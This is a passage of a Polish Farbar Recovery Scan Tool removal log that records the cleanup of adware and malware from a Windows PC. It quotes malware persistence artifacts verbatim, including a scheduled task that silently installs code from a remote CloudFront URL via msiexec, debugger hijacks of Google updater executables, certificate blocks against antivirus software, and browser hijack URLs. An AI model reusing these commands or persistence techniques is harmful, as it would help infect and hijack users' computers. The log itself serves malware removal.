Rezultat naprawy Farbar Recovery Scan Tool (x64) Wersja: 07-06-2017 Uruchomiony przez Lambert (07-06-2017 19:20:32) Run:1 Uruchomiony z C:\Users\Lambert\Downloads Załadowane profile: Lambert (Dostępne profile: Lambert) Tryb startu: Normal ============================================== fixlist - zawartość: ***************** CloseProcesses: CreateRestorePoint: HKLM\ DisallowedCertificates: 03D22C9C66915D58C88912B64C1F984B8344EF09 (Avast Antivirus/Software) <==== UWAGA HKLM\ DisallowedCertificates: 0F684EC1163281085C6AF20528878103ACEFCAAB (Avast Antivirus/Software) <==== UWAGA HKLM\ DisallowedCertificates: 1667908C9E22EFBD0590E088715CC74BE4C60884 (Avast Antivirus/Software) <==== UWAGA HKLM\ DisallowedCertificates: 18DEA4EFA93B06AE997D234411F3FD72A677EECE (Avast Antivirus/Software) <==== UWAGA HKLM\ DisallowedCertificates: 2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF (Avast Antivirus/Software) <==== UWAGA HKLM\ DisallowedCertificates: 249BDA38A611CD746A132FA2AF995A2D3C941264 (Avast Antivirus/Software) <==== UWAGA HKLM\ DisallowedCertificates: 31AC96A6C17C425222C46D55C3CCA6BA12E54DAF (Avast Antivirus/Software) <==== UWAGA HKLM\ DisallowedCertificates: 331E2046A1CCA7BFEF766724394BE6112B4CA3F7 (Avast Antivirus/Software) <==== UWAGA HKLM\ DisallowedCertificates: 3353EA609334A9F23A701B9159E30CB6C22D4C59 (Avast Antivirus/Software) <==== UWAGA HKLM\ DisallowedCertificates: 373C33726722D3A5D1EDD1F1585D5D25B39BEA1A (Avast Antivirus/Software) <==== UWAGA HKLM\ DisallowedCertificates: 3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F (Avast Antivirus/Software) <==== UWAGA HKLM\ DisallowedCertificates: 3D496FA682E65FC122351EC29B55AB94F3BB03FC (Avast Antivirus/Software) <==== UWAGA HKLM\ DisallowedCertificates: 4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159 (Avast Antivirus/Software) <==== UWAGA HKLM\ DisallowedCertificates: 42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01 (Avast Antivirus/Software) <==== UWAGA HKLM\ DisallowedCertificates: 4420C99742DF11DD0795BC15B7B0ABF090DC84DF (Avast Antivirus/Software) <==== UWAGA HKLM\ DisallowedCertificates: 4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF (Avast Antivirus/Software) <==== UWAGA HKLM\ DisallowedCertificates: 5240AB5B05D11B37900AC7712A3C6AE42F377C8C (Avast Antivirus/Software) <==== UWAGA HKLM\ DisallowedCertificates: 5DD3D41810F28B2A13E9A004E6412061E28FA48D (Avast Antivirus/Software) <==== UWAGA HKLM\ DisallowedCertificates: 637162CC59A3A1E25956FA5FA8F60D2E1C52EAC6 (Avast Antivirus/Software) <==== UWAGA HKLM\ DisallowedCertificates: 7457A3793086DBB58B3858D6476889E3311E550E (Avast Antivirus/Software) <==== UWAGA HKLM\ DisallowedCertificates: 76A9295EF4343E12DFC5FE05DC57227C1AB00D29 (Avast Antivirus/Software) <==== UWAGA HKLM\ DisallowedCertificates: 775B373B33B9D15B58BC02B184704332B97C3CAF (Avast Antivirus/Software) <==== UWAGA HKLM\ DisallowedCertificates: 7D7F4414CCEF168ADF6BF40753B5BECD78375931 (Avast Antivirus/Software) <==== UWAGA HKLM\ DisallowedCertificates: 872CD334B7E7B3C3D1C6114CD6B221026D505EAB (Avast Antivirus/Software) <==== UWAGA HKLM\ DisallowedCertificates: 88AD5DFE24126872B33175D1778687B642323ACF (Avast Antivirus/Software) <==== UWAGA HKLM\ DisallowedCertificates: 9132E8B079D080E01D52631690BE18EBC2347C1E (Avast Antivirus/Software) <==== UWAGA HKLM\ DisallowedCertificates: 982D98951CF3C0CA2A02814D474A976CBFF6BDB1 (Avast Antivirus/Software) <==== UWAGA HKLM\ DisallowedCertificates: 9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361 (Avast Antivirus/Software) <==== UWAGA HKLM\ DisallowedCertificates: 9C43F665E690AB4D486D4717B456C5554D4BCEB5 (Avast Antivirus/Software) <==== UWAGA HKLM\ DisallowedCertificates: 9E3F95577B37C74CA2F70C1E1859E798B7FC6B13 (Avast Antivirus/Software) <==== UWAGA HKLM\ DisallowedCertificates: A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99 (Avast Antivirus/Software) <==== UWAGA HKLM\ DisallowedCertificates: A5341949ABE1407DD7BF7DFE75460D9608FBC309 (Avast Antivirus/Software) <==== UWAGA HKLM\ DisallowedCertificates: A59CC32724DD07A6FC33F7806945481A2D13CA2F (Avast Antivirus/Software) <==== UWAGA HKLM\ DisallowedCertificates: AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947 (Avast Antivirus/Software) <==== UWAGA HKLM\ DisallowedCertificates: AD4C5429E10F4FF6C01840C20ABA344D7401209F (Avast Antivirus/Software) <==== UWAGA HKLM\ DisallowedCertificates: AD96BB64BA36379D2E354660780C2067B81DA2E0 (Avast Antivirus/Software) <==== UWAGA HKLM\ DisallowedCertificates: B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84 (Avast Antivirus/Software) <==== UWAGA HKLM\ DisallowedCertificates: CDC37C22FE9272D8F2610206AD397A45040326B8 (Avast Antivirus/Software) <==== UWAGA HKLM\ DisallowedCertificates: D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598 (Avast Antivirus/Software) <==== UWAGA HKLM\ DisallowedCertificates: DB303C9B61282DE525DC754A535CA2D6A9BD3D87 (Avast Antivirus/Software) <==== UWAGA HKLM\ DisallowedCertificates: DB77E5CFEC34459146748B667C97B185619251BA (Avast Antivirus/Software) <==== UWAGA HKLM\ DisallowedCertificates: E22240E837B52E691C71DF248F12D27F96441C00 (Avast Antivirus/Software) <==== UWAGA HKLM\ DisallowedCertificates: E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF (Avast Antivirus/Software) <==== UWAGA HKLM\ DisallowedCertificates: ED841A61C0F76025598421BC1B00E24189E68D54 (Avast Antivirus/Software) <==== UWAGA HKLM\ DisallowedCertificates: F83099622B4A9F72CB5081F742164AD1B8D048C9 (Avast Antivirus/Software) <==== UWAGA HKLM\ DisallowedCertificates: FBB42F089AF2D570F2BF6F493D107A3255A9BB1A (Avast Antivirus/Software) <==== UWAGA HKLM\ DisallowedCertificates: FFFA650F2CB2ABC0D80527B524DD3F9FC172C138 (Avast Antivirus/Software) <==== UWAGA HKLM\...\Policies\Explorer: [EnableShellExecuteHooks] 1 HKU\S-1-5-21-489643024-731826354-959299013-1000\...\Run: [GalaxyClient] => [X] HKU\S-1-5-21-489643024-731826354-959299013-1000\...\Run: [background_fault] => C:\Users\Lambert\AppData\Local\background_fault\aswRD.exe [1419576 2017-05-27] (AVAST Software) <===== UWAGA HKLM\...\Providers\1ol3sxub: C:\Program Files (x86)\Clihotain Configuration\local64spl.dll IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe ShellExecuteHooks: Brak nazwy - {6A69B0BA-392B-11E7-B267-64006A5CFC23} - C:\Users\Lambert\AppData\Roaming\Prageghtthasuy\Cohispphokisy.dll [145408 2017-05-20] () ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku WMI_ActiveScriptEventConsumer_ASEC: <===== UWAGA CHR HomePage: Default -> hxxp://www.luckysearch123.com?type=hp&ts=1495813616&from=ca9a0525&uid=wdcxwd1200js-00mhb0_wd-wcann104216642166&z=7e527a4ccae801a9a9a6823gbz6tcw5b4gdccoceag CHR StartupUrls: Default -> "hxxp://www.luckysearch123.com?type=hp&ts=1495813616&from=ca9a0525&uid=wdcxwd1200js-00mhb0_wd-wcann104216642166&z=7e527a4ccae801a9a9a6823gbz6tcw5b4gdccoceag" HKU\S-1-5-21-489643024-731826354-959299013-1000\...\ChromeHTML: -> C:\Program Files (x86)\Hippig\Application\chrome.exe (Google Inc.) <==== UWAGA HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1495817398&z=539fb33b098d581863e9993g4z3tcw5b0g1q1t5bbg&from=che0812&uid=WDCXWD1200JS-00MHB0_WD-WCANN104216642166&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1495817398&z=539fb33b098d581863e9993g4z3tcw5b0g1q1t5bbg&from=che0812&uid=WDCXWD1200JS-00MHB0_WD-WCANN104216642166&q={searchTerms} HKU\S-1-5-21-489643024-731826354-959299013-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www-searching.com/?pid=s&s=H5Kzbcnbl1BU,6a532031-42f4-47fc-916e-b7d6d8da77f6,&vp=ch&prd=set_ie SearchScopes: HKU\S-1-5-21-489643024-731826354-959299013-1000 -> {9A91F84A-3E08-4774-B825-7A6604704214} URL = hxxp://www-searching.com/s.ashx?prd=opensearch&q={searchTerms}&s=H5Kzbcnbl1BU,6a532031-42f4-47fc-916e-b7d6d8da77f6, ShortcutWithArgument: C:\Users\Lambert\Desktop\Gówno\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://www-searching.com/?prd=set_epf&s=h5kzbcnbl1bu,6a532031-42f4-47fc-916e-b7d6d8da77f6, ShortcutWithArgument: C:\Users\Lambert\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1495817398&z=539fb33b098d581863e9993g4z3tcw5b0g1q1t5bbg&from=che0812&uid=WDCXWD1200JS-00MHB0_WD-WCANN104216642166 R2 BIT; C:\ProgramData\BIT\BIT.dll [1812992 2017-06-01] (TODO: <公司名>) [Brak podpisu cyfrowego] <==== UWAGA S2 DsSvc; C:\ProgramData\Package Cache\{00C5024D-925C-4E9E-A8E6-F9B84ABE0DA0}\packages\Win81_SDK\9bcb3fab78e80d68be28892ea7ad46c3.msp [84 2017-05-25] () [Brak podpisu cyfrowego] R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [98456 2017-05-25] () <==== UWAGA S2 glory; C:\Users\Lambert\AppData\Local\glory\glory.dll [909824 2017-06-01] (glory) [Brak podpisu cyfrowego] <==== UWAGA R2 WinSAPSvc; C:\Users\Lambert\AppData\Roaming\WinSAPSvc\WinSAP.dll [1886720 2017-06-01] () [Brak podpisu cyfrowego] <==== UWAGA U3 aswbdisk; Brak ImagePath U2 snare; Brak ImagePath S4 sptd; \SystemRoot\System32\Drivers\sptd.sys [X] U2 terana; Brak ImagePath S3 VGPU; System32\drivers\rdvgkmd.sys [X] S3 xhunter1; \??\C:\Windows\xhunter1.sys [X] Task: {032BAD74-97C2-43DE-B45B-88930DDF692F} - System32\Tasks\{D7AFBC4C-4474-49BE-80F6-F744826C4525} => C:\Program Files (x86)\Diablo II\Diablo II.exe Task: {2F04D6BD-444A-40B0-9AAF-7E16B78A5008} - System32\Tasks\{C3660774-1430-4C6F-8E8D-021096A1846D} => C:\Users\Lambert\Desktop\adwcleaner_6.040.exe [2016-12-03] () Task: {494E40C4-7065-4724-A0CD-372B912DCB61} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-06-01] () <==== UWAGA Task: {55CA615F-492D-4305-B18F-FC520019D725} - System32\Tasks\{C5C828EA-3D5C-4845-B204-7FE4C2AE81FA} => pcalua.exe -a "C:\Users\Lambert\Desktop\SERIE A OFFICIAL HD KIT PACK V1 2016-17\ModdingWayInstaller.exe" -d "C:\Users\Lambert\Desktop\SERIE A OFFICIAL HD KIT PACK V1 2016-17" Task: {93CDB1CB-5A6C-4B17-925E-CA176B66A3E4} - System32\Tasks\Overwolf Updater Task => C:\Program Files (x86)\Overwolf\OverwolfUpdater.exe Task: {CB1675FB-1CFE-4EA8-B420-931065D8D9E8} - System32\Tasks\Keyboard Checksum Verifier => Rundll32.exe "C:\Program Files\Keyboard Checksum Verifier\Keyboard Checksum Verifier.dll",xVbAXgKyh Task: {CB4D2BD4-C91B-46A3-ACDC-B7BAFFF58620} - System32\Tasks\Arujogh Cloud => C:\Program Files (x86)\Walchshjit\yaupdcache.exe Task: {DB4CEECD-3E4F-4CF8-90E1-AC0086D93F9C} - System32\Tasks\IBUpd2 => C:\Users\Lambert\AppData\Local\BrowserAir\48.0.0.0\updater.exe <==== UWAGA Task: {E5191DB7-0019-441E-A4BD-7057B820C5F5} - System32\Tasks\Clihotain Configuration => C:\Program Files (x86)\Walchshjit\ficult.exe Task: {E81B7F83-F695-4905-BD35-AAD17C8649AE} - System32\Tasks\Microsoft\Windows\DeviceSettings\Thupetherbeqerph => msiexec.exe /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=WDCXWD1200JS-00MHB0_WD-WCANN104216642166&d=20170520 /q <==== UWAGA Task: {E976FE0B-314A-4A6F-AF68-E8A931C88CFB} - System32\Tasks\Trojan Remover => C:\Program Files\Loaris Trojan Remover\ltr.exe Task: {FA76DE69-D3A4-481C-BF44-2C2DC557314C} - System32\Tasks\SMW_UpdateTask_Time_3835313734393736322d2355786c325a5b5734412d34 => Wscript.exe //B "C:\ProgramData\SearchModule\smhe.js" smu.exe /invoke /f:check_services /l:0 <==== UWAGA Task: {FE9FF048-6797-4E07-AA29-BBDCC273E036} - System32\Tasks\{F688C87D-DD38-4E0F-9D49-BFF7ECC53E4D} => pcalua.exe -a "C:\Users\Lambert\Desktop\SERIE A OFFICIAL HD KIT PACK V1 2016-17\ModdingWayInstaller.exe" -d "C:\Users\Lambert\Desktop\SERIE A OFFICIAL HD KIT PACK V1 2016-17" DeleteKey: HKCU\Software\Google\Chrome\Extensions DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla\Firefox\Extensions DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins CMD: netsh advfirewall reset C:\$AV_ASW C:\Cosusp C:\Pipisy C:\Program Files\1ol3sxub C:\Program Files\AVAST Software C:\Program Files\Keyboard Checksum Verifier C:\Program Files\MK C:\Program Files\Common Files\509E0 C:\Program Files\Common Files\Noobzo C:\Program Files (x86)\Clihotain Configuration C:\Program Files (x86)\Firefox C:\Program Files (x86)\Hippig C:\Program Files (x86)\MIO C:\Program Files (x86)\Walchshjit C:\ProgramData\log.binb C:\ProgramData\log.ewbb C:\ProgramData\log.ewbt C:\ProgramData\.mono C:\ProgramData\AVAST Software C:\ProgramData\BIT C:\ProgramData\Loaris C:\ProgramData\SearchModule C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Max Payne-ROKA1969.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Diablo II C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Kolekcja Klasyki C:\ProgramData\Microsoft\Windows\Start Menu\Programs\San Andreas Multiplayer C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TP-LINK C:\ProgramData\Microsoft\Windows\Start Menu\Programs\YeaDesktop C:\ProgramData\Package Cache\{00C5024D-925C-4E9E-A8E6-F9B84ABE0DA0} C:\Stuvatybugtain C:\Users\Lambert\AppData\Local\{CDB39C7B-51CB-4A3E-BDF9-8D90DE43D449} C:\Users\Lambert\AppData\Local\AdvinstAnalytics C:\Users\Lambert\AppData\Local\background_fault C:\Users\Lambert\AppData\Local\BrowserAir C:\Users\Lambert\AppData\Local\Firefox C:\Users\Lambert\AppData\Local\glory C:\Users\Lambert\AppData\Local\Hippig C:\Users\Lambert\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk C:\Users\Lambert\AppData\Local\Phoceshgrherry C:\Users\Lambert\AppData\Local\snare C:\Users\Lambert\AppData\Local\terana C:\Users\Lambert\AppData\Local\THQ C:\Users\Lambert\AppData\Roaming\AVAST Software C:\Users\Lambert\AppData\Roaming\DAEMON Tools Lite C:\Users\Lambert\AppData\Roaming\Event Monitor C:\Users\Lambert\AppData\Roaming\Firefox C:\Users\Lambert\AppData\Roaming\Google C:\Users\Lambert\AppData\Roaming\Microleaves C:\Users\Lambert\AppData\Roaming\Mozilla\Firefox\naweriweentcofise C:\Users\Lambert\AppData\Roaming\Prageghtthasuy C:\Users\Lambert\AppData\Roaming\Showuk C:\Users\Lambert\AppData\Roaming\UCChannel C:\Users\Lambert\AppData\Roaming\WinSAPSvc C:\Users\Lambert\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome (2).lnk C:\Users\Lambert\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk C:\Users\Lambert\Desktop\AdwCleaner Portable AdwCleaner 5.019 PL C:\Users\Lambert\Desktop\Gówno\Battlefield 1942.lnk C:\Users\Lambert\Desktop\Gówno\Counter-Strike Source.lnk C:\Users\Lambert\Desktop\Gówno\DAEMON Tools Lite.lnk C:\Users\Lambert\Desktop\Gówno\Diablo III.lnk C:\Users\Lambert\Desktop\Gówno\Grand Theft Auto Vice City.lnk C:\Users\Lambert\Desktop\Gówno\GTA Vice City.lnk C:\Users\Lambert\Desktop\Gówno\MassEffectConfig.lnk C:\Users\Lambert\Desktop\Gówno\Quick Server.lnk C:\Users\Lambert\Desktop\Gówno\San Andreas Multiplayer.lnk C:\Users\Lambert\Desktop\Gówno\Skype.lnk C:\Users\Lambert\Desktop\Gówno\Spartan.lnk C:\Users\Lambert\Downloads\AdwCleaner*.exe C:\Users\Lambert\Downloads\Emsisoft*.exe C:\Users\Lambert\Downloads\Loaris*.exe C:\Users\Lambert\Downloads\Malwarebytes*.exe C:\Users\Lambert\Downloads\ReimageRepair.exe C:\Users\Public\Desktop\Google Chrome.lnk C:\Users\Public\Desktop\Mozilla Firefox.lnk C:\Users\Public\Documents\report.dat C:\Users\Public\Documents\temp.dat C:\Windows\Reimage.ini C:\Windows\csrss.exe C:\Windows\taskmgr.exe C:\Windows\Azart C:\Windows\system32\Drivers\*.tmp C:\Windows\system32\log Hosts: EmptyTemp: ***************** Procesy zostały pomyślnie zamknięte. Punkt przywracania został pomyślnie utworzony. HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\03D22C9C66915D58C88912B64C1F984B8344EF09 => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\0F684EC1163281085C6AF20528878103ACEFCAAB => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\1667908C9E22EFBD0590E088715CC74BE4C60884 => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\18DEA4EFA93B06AE997D234411F3FD72A677EECE => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\249BDA38A611CD746A132FA2AF995A2D3C941264 => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\31AC96A6C17C425222C46D55C3CCA6BA12E54DAF => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\331E2046A1CCA7BFEF766724394BE6112B4CA3F7 => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\3353EA609334A9F23A701B9159E30CB6C22D4C59 => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\373C33726722D3A5D1EDD1F1585D5D25B39BEA1A => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\3D496FA682E65FC122351EC29B55AB94F3BB03FC => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159 => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01 => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\4420C99742DF11DD0795BC15B7B0ABF090DC84DF => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\5240AB5B05D11B37900AC7712A3C6AE42F377C8C => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\5DD3D41810F28B2A13E9A004E6412061E28FA48D => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\637162CC59A3A1E25956FA5FA8F60D2E1C52EAC6 => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\7457A3793086DBB58B3858D6476889E3311E550E => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\76A9295EF4343E12DFC5FE05DC57227C1AB00D29 => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\775B373B33B9D15B58BC02B184704332B97C3CAF => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\7D7F4414CCEF168ADF6BF40753B5BECD78375931 => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\872CD334B7E7B3C3D1C6114CD6B221026D505EAB => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\88AD5DFE24126872B33175D1778687B642323ACF => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\9132E8B079D080E01D52631690BE18EBC2347C1E => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\982D98951CF3C0CA2A02814D474A976CBFF6BDB1 => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361 => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\9C43F665E690AB4D486D4717B456C5554D4BCEB5 => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\9E3F95577B37C74CA2F70C1E1859E798B7FC6B13 => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99 => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\A5341949ABE1407DD7BF7DFE75460D9608FBC309 => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\A59CC32724DD07A6FC33F7806945481A2D13CA2F => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947 => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\AD4C5429E10F4FF6C01840C20ABA344D7401209F => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\AD96BB64BA36379D2E354660780C2067B81DA2E0 => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84 => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\CDC37C22FE9272D8F2610206AD397A45040326B8 => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598 => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\DB303C9B61282DE525DC754A535CA2D6A9BD3D87 => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\DB77E5CFEC34459146748B667C97B185619251BA => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\E22240E837B52E691C71DF248F12D27F96441C00 => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\ED841A61C0F76025598421BC1B00E24189E68D54 => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\F83099622B4A9F72CB5081F742164AD1B8D048C9 => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\FBB42F089AF2D570F2BF6F493D107A3255A9BB1A => klucz pomyślnie usunięto HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\FFFA650F2CB2ABC0D80527B524DD3F9FC172C138 => klucz pomyślnie usunięto HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\EnableShellExecuteHooks => Wartość pomyślnie usunięto HKU\S-1-5-21-489643024-731826354-959299013-1000\Software\Microsoft\Windows\CurrentVersion\Run\\GalaxyClient => Wartość pomyślnie usunięto HKU\S-1-5-21-489643024-731826354-959299013-1000\Software\Microsoft\Windows\CurrentVersion\Run\\background_fault => Wartość pomyślnie usunięto HKLM\SYSTEM\CurrentControlSet\Control\Print\Providers\1ol3sxub => klucz pomyślnie usunięto HKLM\SYSTEM\CurrentControlSet\Control\Print\Providers\\order 1ol3sxub => pomyślnie usunięto HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\GoogleUpdate.exe => klucz pomyślnie usunięto HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\GoogleUpdaterService.exe => klucz pomyślnie usunięto HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\ShellExecuteHooks\\{6A69B0BA-392B-11E7-B267-64006A5CFC23} => Wartość pomyślnie usunięto HKCR\CLSID\{6A69B0BA-392B-11E7-B267-64006A5CFC23} => klucz nie znaleziono. HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\00asw => klucz pomyślnie usunięto HKCR\CLSID\{472083B0-C522-11CF-8763-00608CC02F24} => klucz nie znaleziono. HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\00avast => klucz pomyślnie usunięto HKCR\CLSID\{472083B0-C522-11CF-8763-00608CC02F24} => klucz nie znaleziono. WMI_ActiveScriptEventConsumer_ASEC: <===== UWAGA => pomyślnie usunięto Chrome HomePage => pomyślnie usunięto Chrome StartupUrls => pomyślnie usunięto HKU\S-1-5-21-489643024-731826354-959299013-1000_Classes\ChromeHTML => klucz pomyślnie usunięto HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Search Page => Wartość pomyślnie przywrócono HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Default_Search_URL => Wartość pomyślnie przywrócono HKU\S-1-5-21-489643024-731826354-959299013-1000\Software\Microsoft\Internet Explorer\Main\\Start Page => Wartość pomyślnie przywrócono HKU\S-1-5-21-489643024-731826354-959299013-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{9A91F84A-3E08-4774-B825-7A6604704214} => klucz pomyślnie usunięto HKCR\CLSID\{9A91F84A-3E08-4774-B825-7A6604704214} => klucz nie znaleziono. C:\Users\Lambert\Desktop\Gówno\Mozilla Firefox.lnk => Skrót - argument pomyślnie usunięto. C:\Users\Lambert\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk => Skrót - argument pomyślnie przywrócono BIT => Usługa pomyślnie zatrzymana. HKLM\System\CurrentControlSet\Services\BIT => klucz pomyślnie usunięto BIT => serwis pomyślnie usunięto HKLM\System\CurrentControlSet\Services\DsSvc => klucz pomyślnie usunięto DsSvc => serwis pomyślnie usunięto HKLM\System\CurrentControlSet\Services\FirefoxU => klucz pomyślnie usunięto FirefoxU => serwis pomyślnie usunięto HKLM\System\CurrentControlSet\Services\glory => klucz pomyślnie usunięto glory => serwis pomyślnie usunięto WinSAPSvc => Usługa pomyślnie zatrzymana. HKLM\System\CurrentControlSet\Services\WinSAPSvc => klucz pomyślnie usunięto WinSAPSvc => serwis pomyślnie usunięto HKLM\System\CurrentControlSet\Services\aswbdisk => klucz pomyślnie usunięto aswbdisk => serwis pomyślnie usunięto HKLM\System\CurrentControlSet\Services\snare => klucz pomyślnie usunięto snare => serwis pomyślnie usunięto HKLM\System\CurrentControlSet\Services\sptd => klucz pomyślnie usunięto sptd => serwis pomyślnie usunięto HKLM\System\CurrentControlSet\Services\terana => klucz pomyślnie usunięto terana => serwis pomyślnie usunięto HKLM\System\CurrentControlSet\Services\VGPU => klucz pomyślnie usunięto VGPU => serwis pomyślnie usunięto HKLM\System\CurrentControlSet\Services\xhunter1 => klucz pomyślnie usunięto xhunter1 => serwis 